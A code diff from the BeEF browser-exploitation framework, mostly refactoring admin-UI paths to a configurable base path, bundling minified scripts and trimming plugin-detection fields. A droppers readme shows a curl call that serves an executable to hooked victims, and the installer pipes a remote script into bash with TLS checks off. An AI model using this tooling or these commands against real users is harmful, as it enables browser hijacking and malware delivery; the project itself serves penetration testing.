+      config = BeEF::Core::Configuration.instance
+
+      # Web UI base path, like http://beef_domain/<bp>/panel
+      @bp = config.get "beef.http.web_ui_basepath"
+      auth_url = "#{@bp}/authentication"
       
       # test if session is unauth'd and whether the auth functionality is requested
       if not @session.valid_session?(@request) and not self.class.eql?(BeEF::Extension::AdminUI::Controllers::Authentication)
@@ -78,14 +82,14 @@ module AdminUI
 
     end
 
-    # Constructs a redirect script
-    def script_redirect(location) "<script> document.location=\"#{location}\"</script>" end
-    
-    # Constructs a html script tag
-    def script_tag(filename) "<script src=\"#{$url}/ui/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
-    
+    # Constructs a html script tag (from media/javascript directory)
+    def script_tag(filename) "<script src=\"#{$url}#{@bp}/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
+
+    # Constructs a html script tag (from media/javascript-min directory)
+    def script_tag_min(filename) "<script src=\"#{$url}#{@bp}/media/javascript-min/#{filename}\" type=\"text/javascript\"></script>" end
+
     # Constructs a html stylesheet tag
-    def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}/ui/media/css/#{filename}\" type=\"text/css\" />" end
+    def stylesheet_tag(filename) "<link rel=\"stylesheet\" href=\"#{$url}#{@bp}/media/css/#{filename}\" type=\"text/css\" />" end
 
     # Constructs a hidden html nonce tag
     def nonce_tag 
@@ -93,6 +97,10 @@ module AdminUI
       "<input type=\"hidden\" name=\"nonce\" id=\"nonce\" value=\"" + @session.get_nonce + "\"/>"
     end
 
+    def base_path
+      "#{@bp}"
+    end
+
     private
     
     @eruby

extensions/admin_ui/controllers/authentication/index.html

@@ -9,7 +9,7 @@
 	
 	<%= script_tag 'ext-base.js' %>
 	<%= script_tag 'ext-all.js' %>
-	<%= script_tag 'ui/authentication.js' %>
+    <%= script_tag_min 'web_ui_auth.js' %>
 	
 	<%= stylesheet_tag 'ext-all.css' %>
 	
@@ -31,6 +31,6 @@
 </head>
 
 <body>
-	<div id="centered"><img id="beef-logo" src="/ui/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
+	<div id="centered"><img id="beef-logo" src="<%= base_path %>/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
 </body>
 </html>

extensions/admin_ui/controllers/panel/index.html

@@ -12,47 +12,8 @@
 
 	<%= script_tag 'ext-base.js' %>
 	<%= script_tag 'ext-all.js' %>
-	<%= script_tag 'ext-beef.js' %>
-
-	<!-- jQuery encoder (ESAPI way) -->
-	<%= script_tag 'esapi/jquery-1.6.4.min.js' %>
-	<%= script_tag 'esapi/Class.create.js' %>
-	<%= script_tag 'esapi/jquery-encoder-0.1.0.js' %>
-	<script type="text/javascript" language="JavaScript">var $jEncoder = jQuery.noConflict();</script>
-
-    <!-- BeEF Web UI common functions-->
-    <%= script_tag 'ui/common/beef_common.js' %>
-
-	<%= script_tag 'ux/TabCloseMenu.js' %>
-	<%= script_tag 'ux/StatusBar.js' %>
-	<%= script_tag 'ux/PagingStore.js' %>
-
-	<%= script_tag 'ui/panel/common.js' %>
-	<%= script_tag 'ui/panel/DistributedEngine.js' %>
-	<%= script_tag 'ui/panel/PanelStatusBar.js' %>
-
-	<%= script_tag 'ui/panel/tabs/ZombieTabDetails.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabLogs.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabCommands.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabRider.js' %>
-	<%= script_tag 'ui/panel/tabs/ZombieTabXssRays.js' %>
-
-    <%= script_tag 'wterm/wterm.jquery.js' %>
+    <%= script_tag_min 'web_ui_all.js' %>
     <%= stylesheet_tag 'wterm.css' %>
-    <script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
-    <%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
-    <%= script_tag 'ui/panel/tabs/ZombieTabAutorun.js' %>
-    <%= script_tag 'ui/panel/PanelViewer.js' %>
-	<%= script_tag 'ui/panel/DataGrid.js' %>
-	<%= script_tag 'ui/panel/MainPanel.js' %>
-	<%= script_tag 'ui/panel/ZombieTab.js' %>
-	<%= script_tag 'ui/panel/ZombieTabs.js' %>
-	<%= script_tag 'ui/panel/zombiesTreeList.js' %>
-	<%= script_tag 'ui/panel/ZombiesMgr.js' %>
-	<%= script_tag 'ui/panel/Logout.js' %>
-	<%= script_tag 'ui/panel/WelcomeTab.js' %>
-	<!-- <%= script_tag 'ui/panel/HackVertorTab.js' %> -->
-
 	<%= stylesheet_tag 'ext-all.css' %>
 	<%= stylesheet_tag 'base.css' %>
 </head>
@@ -63,7 +24,7 @@
 		<div class="left-menu" id="header-right">
 		</div>
 		<div class="right-menu">
-			<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> 
+			<img src="<%= base_path %>/media/images/favicon.ico" alt="BeEF" title="BeEF" />
 			BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | 
 			<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> | 
 			<a id='do-logout-menu' href='#'>Logout</a>

extensions/admin_ui/controllers/panel/panel.rb

@@ -87,14 +87,12 @@ module BeEF
             has_flash       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
-            has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
             has_webrtc      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
             has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
             has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
             has_wmp         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP') 
-            has_vlc         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
             has_foxit       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
             date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
@@ -113,13 +111,11 @@ module BeEF
                 'has_flash'       => has_flash,
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
-                'has_java'        => has_java,
                 'has_webrtc'      => has_webrtc,
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
                 'has_quicktime'   => has_quicktime,
                 'has_wmp'         => has_wmp,
-                'has_vlc'         => has_vlc,
                 'has_foxit'       => has_foxit,
                 'has_realplayer'  => has_realplayer,
                 'date_stamp'      => date_stamp

extensions/admin_ui/media/javascript-min/readme

@@ -0,0 +1,2 @@
+This directory will contain minified JavaScript files used by the Web UI.
+Those files are excluded from the GIT report through the .gitignore file.

extensions/admin_ui/media/javascript/ext-beef.js

@@ -1,36 +0,0 @@
-//
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-Ext.beef = function(){
-    var msgCt;
-
-    function createBox(t, s){
-        return ['<div class="msg">',
-                '<div class="x-box-tl"><div class="x-box-tr"><div class="x-box-tc"></div></div></div>',
-                '<div class="x-box-ml"><div class="x-box-mr"><div class="x-box-mc"><h3>', t, '</h3>', s, '</div></div></div>',
-                '<div class="x-box-bl"><div class="x-box-br"><div class="x-box-bc"></div></div></div>',
-                '</div>'].join('');
-    }
-    return {
-        msg : function(title, format){
-            if(!msgCt){
-                msgCt = Ext.DomHelper.insertFirst(document.body, {id:'msg-div'}, true);
-            }
-            msgCt.alignTo(document, 't-t');
-            var s = String.format.apply(String, Array.prototype.slice.call(arguments, 1));
-            var m = Ext.DomHelper.append(msgCt, {html:createBox(title, s)}, true);
-            m.slideIn('t').pause(1).ghost("t", {remove:true});
-        },
-
-        init : function(){
-
-            var lb = Ext.get('lib-bar');
-            if(lb){
-                lb.show();
-            }
-        }
-    };
-}();

extensions/admin_ui/media/javascript/ui/authentication.js

@@ -12,7 +12,7 @@ Ext.onReady(function() {
 		login_form.getForm().submit({
 
 			success: function() {
-				window.location.href = '/ui/panel'
+				window.location.href = "<%= @base_path %>/panel"
 			}, 
 			failure: function() {
 				if(Ext.get('loginError') == null) {

extensions/admin_ui/media/javascript/ui/common/beef_common.js

@@ -20,7 +20,7 @@ if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
          */
         get_rest_token: function() {
             if(this.rest_token.length == 0){
-                var url = "/ui/modules/getRestfulApiToken.json";
+                var url = "<%= @base_path %>/modules/getRestfulApiToken.json";
                 jQuery.ajax({
                     contentType: 'application/json',
                     dataType: 'json',

extensions/admin_ui/media/javascript/ui/panel/DataGrid.js

@@ -45,7 +45,7 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'type',
 			sortable: true,
 			width: 60,
-			renderer: function(value, metaData, record, rowIndex, colIndex, store) {
+			renderer: function(value) {
 				return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
 			}
 		}, {
@@ -54,7 +54,9 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'event',
 			sortable:true,
 			width: 420,
-			renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
+			renderer: function(value){
+                return $jEncoder.encoder.encodeForHTML(value);
+            }
 		}, {
 			id: 'log-date',
 			header: "Date",

extensions/admin_ui/media/javascript/ui/panel/Logout.js

@@ -10,12 +10,12 @@ DoLogout = function() {
 	
 	after_logout = function() {
 		// will redirect the UA to the login
-		window.location.href = '/ui/panel'		
+		window.location.href = '<%= @base_path %>/panel'
 	}
 	
 	button.on('click', function(){
 		Ext.Ajax.request({
-			url: '/ui/authentication/logout',
+			url: '<%= @base_path %>/authentication/logout',
 			method: 'POST',
 		    params: 'nonce=' + Ext.get("nonce").dom.value,
 			success: after_logout,

extensions/admin_ui/media/javascript/ui/panel/MainPanel.js

@@ -29,7 +29,7 @@ MainPanel = function(){
         }
     });
 
-    this.grid = new DataGrid('/ui/logs/all.json',30);
+    this.grid = new DataGrid('<%= @base_path %>/logs/all.json',30);
 	this.grid.border = false;
     this.welcome_tab = new WelcomeTab;
 	//this.hooks_tab = new HooksTab;

extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js

@@ -47,7 +47,7 @@ var lastpoll = new Date().getTime();
 Ext.TaskMgr.start({
 	run: function() {
 		Ext.Ajax.request({
-			url: '/ui/panel/hooked-browser-tree-update.json',
+			url: '<%= @base_path %>/panel/hooked-browser-tree-update.json',
 			method: 'POST',
 			success: function(response) {
 				var updates;
@@ -56,7 +56,7 @@ Ext.TaskMgr.start({
 				} catch (e) {
 					//The framework has probably been reset and you're actually logged out
 					var hr = document.getElementById("header-right");
-					hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
+					hr.innerHTML = "You appear to be logged out. <a href='<%= @base_path %>/panel/'>Login</a>";
 				}
 				var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
 				var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;

extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js

@@ -12,7 +12,7 @@ WelcomeTab = function() {
 
     welcome = " \
               <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
-              <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
+              <p><img src='<%= @base_path %>/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
               <p>Official website: <a href='http://beefproject.com/'>http://beefproject.com/</a></p><br />\
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
               <p>Welcome to BeEF!</p><br /> \

extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js

@@ -26,20 +26,18 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_flash          = zombie_array[index]["has_flash"];
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
-		var has_java           = zombie_array[index]["has_java"];
 		var has_webrtc         = zombie_array[index]["has_webrtc"];
 		var has_activex        = zombie_array[index]["has_activex"];
 		var has_wmp            = zombie_array[index]["has_wmp"]; 
-		var has_vlc            = zombie_array[index]["has_vlc"];
 		var has_foxit          = zombie_array[index]["has_foxit"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var has_realplayer     = zombie_array[index]["has_realplayer"];
 		var date_stamp         = zombie_array[index]["date_stamp"];
 
-		text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
-		text+= "<img src='/ui/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
-		text+= "<img src='/ui/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text = "<img src='<%= @base_path %>/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
+		text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
 		text+= ip;
 
 		balloon_text = "IP: "                  + ip;
@@ -48,14 +46,12 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-		balloon_text+= "<br/>Java: "           + has_java;
 		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
 		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
 		balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
-		balloon_text+= "<br/>VLC: "            + has_vlc;
 		balloon_text+= "<br/>Foxit: "          + has_foxit;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;

extensions/admin_ui/media/javascript/ui/panel/common.js

@@ -111,7 +111,7 @@ function get_dynamic_payload_details(payload, zombie) {
 	modid = Ext.getCmp( 'form-zombie-'+zombie.session+'-field-mod_id').value
 	Ext.Ajax.request({
 		loadMask: true,
-		url: '/ui/modules/select/commandmodule.json',
+		url: '/<%= @base_path %>/modules/select/commandmodule.json',
 		method: 'POST',
 		params: 'command_module_id=' + modid  + '&' + 'payload_name=' + payload,
 		success: function(resp) {
@@ -146,7 +146,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 	panel.removeAll();
 	
 	Ext.Ajax.request({
-		url: '/ui/modules/select/command.json',
+		url: '<%= @base_path %>/modules/select/command.json',
 		method: 'POST',
 		params: 'command_id=' + command_id,
 		loadMask: true,
@@ -159,7 +159,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 			}
 			
 			var form = new Ext.form.FormPanel({
-				url: '/ui/modules/commandmodule/reexecute',
+				url: '<%= @base_path %>/modules/commandmodule/reexecute',
 				id: 'form-command-module-zombie-'+zombie.session,
 				border: false,
 				labelWidth: 75,
@@ -208,7 +208,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 			});
 			
 			var grid_store = new Ext.data.JsonStore({
-				url: '/ui/modules/select/command_results.json?command_id='+command_id,
+				url: '<%= @base_path %>/modules/select/command_results.json?command_id='+command_id,
 				storeId: 'command-results-store-zombie-'+zombie.session,
 		        root: 'results',
 				remoteSort: false,
@@ -241,7 +241,8 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 				viewConfig: {
 					forceFit:true
 				},
-				
+
+			// render command responses
 		        columns:[new Ext.grid.RowNumberer({width: 20}), {
 			            dataIndex: 'date',
 			            sortable: false,
@@ -249,21 +250,27 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
 							html += '<p>';
 							for(index in record.data.data) {
-								result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
-								index = index.toString().replace('_', ' ');
-								// Check if the data is the image parameter and that it's a base64 encoded png.
-								if (result.substring(0,28) == "image=data:image/png;base64,") {
-									// Lets display the image
+								result = record.data.data[index];
+								index  = index.toString().replace('_', ' ');
+
+								// Check for a base64 encoded image
+								var header = "image=data:image/(jpg|png);base64,";
+								var re = new RegExp(header, "");
+								if (result.match(re)) {
+
+									// Render the image
 									try {
-										base64_data = window.atob(result.substring(29,result.length));
-										html += String.format('<img src="{0}" /><br>', result.substring(6));
+										var img = result.replace(/[\r\n]/g, '');
+										base64_data = window.atob(img.replace(re, ''));
+										html += String.format('<img src="{0}" /><br>', img.replace(/^image=/, ''));
 									} catch(e) {
-										beef.debug("Received invalid base64 encoded image string: "+e.toString());
+										console.log("Received invalid base64 encoded image string: "+e.toString());
 										html += String.format('<b>{0}</b>: {1}<br>', index, result);
 									}
+
+								// output escape everything else, but allow the <br> tag for better rendering.
 								} else {
-									// output escape everything, but allow the <br> tag for better rendering.
-									html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
 								}
 							}
 
@@ -313,7 +320,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
 	} else {
 		Ext.Ajax.request({
 			loadMask: true,
-			url: '/ui/modules/select/commandmodule.json',
+			url: '<%= @base_path %>/modules/select/commandmodule.json',
 			method: 'POST',
 			params: 'command_module_id=' + command_module_id,
 			success: function(resp) {
@@ -324,9 +331,9 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
 					return;
 				}
 
-				var submiturl = '/ui/modules/commandmodule/new';
+				var submiturl = '<%= @base_path %>/modules/commandmodule/new';
 				if(module.dynamic){
-					submiturl = '/ui/modules/commandmodule/dynamicnew';
+					submiturl = '<%= @base_path %>/modules/commandmodule/dynamicnew';
 				}
 				
 				module = module.command_modules[1];

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js

@@ -248,7 +248,7 @@ ZombieTab_Autorun = function(zombie) {
                 }
          }})],
          loader: new Ext.tree.TreeLoader({
-                dataUrl: '/ui/modules/select/commandmodules/tree.json',
+                dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
                 baseParams: {zombie_session: zombie.session},
                 createNode: function(attr) {
                 if(attr.checked == null){attr.checked = false;}

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js

@@ -19,7 +19,7 @@ ZombieTab_Commands = function(zombie) {
 
 	var command_module_grid = new Ext.grid.GridPanel({
 		store: new Ext.data.JsonStore({
-				url: '/ui/modules/commandmodule/commands.json',
+				url: '<%= @base_path %>/modules/commandmodule/commands.json',
 				params: {  // insert the nonce with the form
 						nonce: Ext.get ("nonce").dom.value
 				},
@@ -107,7 +107,7 @@ ZombieTab_Commands = function(zombie) {
 		rootVisible: false,
 		root: {nodeType: 'async'},
 		loader: new Ext.tree.TreeLoader({
-          dataUrl: '/ui/modules/select/commandmodules/tree.json',
+          dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
           baseParams: {zombie_session: zombie.session},
           listeners:{
             beforeload: function(treeloader, node, callback) {

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js

@@ -10,7 +10,7 @@
 ZombieTab_DetailsTab = function(zombie) {
 	
 	var store_summary = new Ext.data.GroupingStore({
-			url: '/ui/modules/select/zombie_summary.json',
+			url: '<%= @base_path %>/modules/select/zombie_summary.json',
 			baseParams: {zombie_session: zombie.session} ,
 			reader: new Ext.data.JsonReader({
 					root: 'results'

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js

@@ -9,7 +9,7 @@
  */
 ZombieTab_LogTab = function(zombie) {
 
-	var zombieLog = new DataGrid('/ui/logs/zombie.json',30,{session:zombie.session});
+	var zombieLog = new DataGrid('<%= @base_path %>/logs/zombie.json',30,{session:zombie.session});
 	zombieLog.border = false;
 
 	ZombieTab_LogTab.superclass.constructor.call(this, {

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js

@@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) {
 		title: 'Proxy',
 		layout: 'fit',
 		padding: '10 10 10 10',
-                html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
+                html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
 		listeners: {
 			activate: function(proxy_panel) {
 				// to do: refresh list of hooked browsers
@@ -56,7 +56,7 @@ ZombieTab_Requester = function(zombie) {
 	 ********************************************/
 	var history_panel_store = new Ext.ux.data.PagingJsonStore({
 		storeId: 'requester-history-store-zombie-'+zombie.session,
-		url: '/ui/requester/history.json',
+		url: '<%= @base_path %>/requester/history.json',
 		remoteSort: false,
 		autoDestroy: true,
 		autoLoad: false,
@@ -169,7 +169,7 @@ ZombieTab_Requester = function(zombie) {
 		
 		listeners: {
 			activate: function(history_panel) {
-				history_panel.items.items[0].store.reload({params:{url:'/ui/requester/history.json'}});
+				history_panel.items.items[0].store.reload({params:{url:'<%= @base_path %>/requester/history.json'}});
 			}
 		}
 	});
@@ -190,7 +190,7 @@ ZombieTab_Requester = function(zombie) {
 		var form = new Ext.FormPanel({
 			title: 'Forge Raw HTTP Request',
 			id: 'requester-request-form-zombie'+zombie.session,
-			url: '/ui/requester/send',
+			url: '<%= @base_path %>/requester/send',
 			hideLabels : true,
 			border: false,
 			padding: '3px 5px 0 5px',
@@ -251,7 +251,7 @@ ZombieTab_Requester = function(zombie) {
 		bar.update_sending('Getting response...');
 		
 		Ext.Ajax.request({
-			url: '/ui/requester/response.json',
+			url: '<%= @base_path %>/requester/response.json',
 			loadMask: true,
 			
 			params: {

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js

@@ -23,7 +23,7 @@ ZombieTab_XssRaysTab = function(zombie) {
 
      var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({
         storeId: 'xssrays-logs-store-zombie-' + zombie.session,
-        url: '/ui/xssrays/zombie.json',
+        url: '/<%= @base_path %>/xssrays/zombie.json',
         remoteSort: false,
         autoDestroy: true,
         autoLoad: false,
@@ -94,7 +94,7 @@ ZombieTab_XssRaysTab = function(zombie) {
 		var form = new Ext.FormPanel({
 			title: 'Scan settings',
 			id: 'xssrays-config-form-zombie'+zombie.session,
-			url: '/ui/xssrays/createNewScan',
+			url: '<%= @base_path %>/xssrays/createNewScan',
             labelWidth: 230,
 			border: false,
 			padding: '3px 5px 0 5px',

extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js

@@ -85,14 +85,14 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
                   switch (item.id) {
                       case 'use_as_proxy':
                            Ext.Ajax.request({
-                                url: '/ui/proxy/setTargetZombie',
+                                url: '<%= @base_path %>/proxy/setTargetZombie',
                                 method: 'POST',
                                 params: 'hb_id=' + escape(hb_id)
                             });
                           break;
                        case 'xssrays_hooked_domain':
                            Ext.Ajax.request({
-                                url: '/ui/xssrays/set_scan_target',
+                                url: '<%= @base_path %>/xssrays/set_scan_target',
                                 method: 'POST',
                                 params: 'hb_id=' + escape(hb_id)
                             });

extensions/admin_ui/media/javascript/wterm/wterm.jquery.js

@@ -422,3 +422,6 @@
   };
 
 })( jQuery );
+
+
+var $jwterm = jQuery.noConflict();

extensions/demos/html/basic.html

@@ -1,10 +1,10 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html>
 <!--
     Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
-<html>
 <head>
 	<title>BeEF Basic Demo</title>
 	<script>
@@ -19,7 +19,6 @@
 		Have fun while your browser is working against you.
 	</p>
 		
-	<p>
 		These links are for demonstrating the "Get Page HREFs" command module<br />
 	<ul>
 	
@@ -28,7 +27,6 @@
 	<li><a href="http://slashdot.org/" target="_blank">Slashdot</a>
 
 	</ul>
-	</p>
 
     <p>Have a go at the event logger.<br />
     <label for="imptxt">Insert your secret here:</label>&nbsp;&nbsp;<input type="text" id="imptxt" name="Important Text" /></p>

extensions/evasion/obfuscation/minify.rb

@@ -6,7 +6,7 @@
 module BeEF
   module Extension
     module Evasion
-      require 'jsmin'
+      require 'uglifier'
       class Minify
         include Singleton
 
@@ -15,7 +15,7 @@ module BeEF
         end
 
         def execute(input, config)
-          input = JSMin.minify(input)
+          input = Uglifier.compile(input)
           print_debug "[OBFUSCATION - MINIFIER] Javascript has been minified"
           input
         end

extensions/metasploit/config.yaml

@@ -33,6 +33,9 @@ beef:
               {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
               {os: 'bt5', path: '/opt/framework3/msf3/'},
               {os: 'backbox', path: '/opt/metasploit3/msf3/'},
+              {os: 'kali', path: '/usr/share/metasploit-framework/'},
+              #{os: 'pentoo', path: '/usr/lib64/metasploit9999/'},
+              {os: 'pentoo', path: '/usr/lib/metasploit'},
               {os: 'win', path: 'c:\\metasploit-framework\\'},
               {os: 'custom', path: ''}
             ]

extensions/social_engineering/droppers/readme.txt

@@ -0,0 +1,9 @@
+This directory will contain the droppers (executables, JARs, browser extensions, etc..)
+that you want to have available on the BeEF server.
+
+For example, if you want to have bin.exe available at http://beefserver/bin.exe,
+use the following RESTful API call:
+
+curl -H "Content-Type: application/json; charset=UTF-8" -d
+'{"mount":"/bin.exe", "local_file":"/extensions/social_engineering/droppers/bin.exe"}'
+ -X POST http://beefserver/api/server/bind?token=<token>

extensions/social_engineering/mass_mailer/mass_mailer.rb

@@ -56,7 +56,7 @@ module BeEF
               end
             end
           else
-            smtp.start(@helo, @auth) do |smtp|
+            smtp.start(@helo) do |smtp|
               tos_hash.each do |to, name|
                 message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
                 smtp.send_message(message, fromaddr, to)

install-beef

@@ -5,6 +5,8 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+set -e
+
 clear
 echo "======================================"
 echo "          BeEF Installer   "
@@ -76,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
 
 sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
 
-bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
 
 echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
 

liveCD/BeEFLive.sh

@@ -189,6 +189,8 @@ show_menu() {
 			 git stash
 			 git pull
 			 msf="0"
+			 # check for new bundle requirements and update
+		     bundle update
 		fi
 		
